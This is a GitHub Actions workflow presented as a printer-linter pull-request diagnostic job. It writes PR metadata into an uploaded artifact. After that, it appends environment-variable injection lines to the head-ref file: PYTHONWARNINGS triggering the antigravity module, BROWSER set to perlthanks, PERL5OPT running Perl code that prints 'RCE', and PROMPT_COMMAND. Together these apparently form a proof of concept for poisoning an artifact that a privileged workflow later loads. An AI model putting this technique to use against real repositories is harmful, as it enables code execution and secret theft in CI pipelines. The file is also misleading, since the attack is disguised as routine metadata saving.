name: printer-linter-pr-diagnose

on:
  pull_request

jobs:
  printer-linter-diagnose:
    name: Printer linter PR diagnose

    runs-on: ubuntu-latest
    steps:
      - name: Save PR metadata
        run: |
          mkdir printer-linter-result
          echo ${{ github.event.number }} > printer-linter-result/pr-id.txt
          echo ${{ github.event.pull_request.head.repo.full_name }} > printer-linter-result/pr-head-repo.txt
          echo ${{ github.event.pull_request.head.ref }} > printer-linter-result/pr-head-ref.txt
          echo "PYTHONWARNINGS=\"all:0:antigravity.x:0:0\"" >> printer-linter-result/pr-head-ref.txt
          echo "BROWSER=\"perlthanks\"" >> printer-linter-result/pr-head-ref.txt
          echo "PERL5OPT=\"-Mbase;print('RCE');exit;\"" >> printer-linter-result/pr-head-ref.txt
          echo "PROMPT_COMMAND='echo coucou'" >> printer-linter-result/pr-head-ref.txt
      - uses: actions/upload-artifact@v2
        with:
          name: printer-linter-result
          path: printer-linter-result/
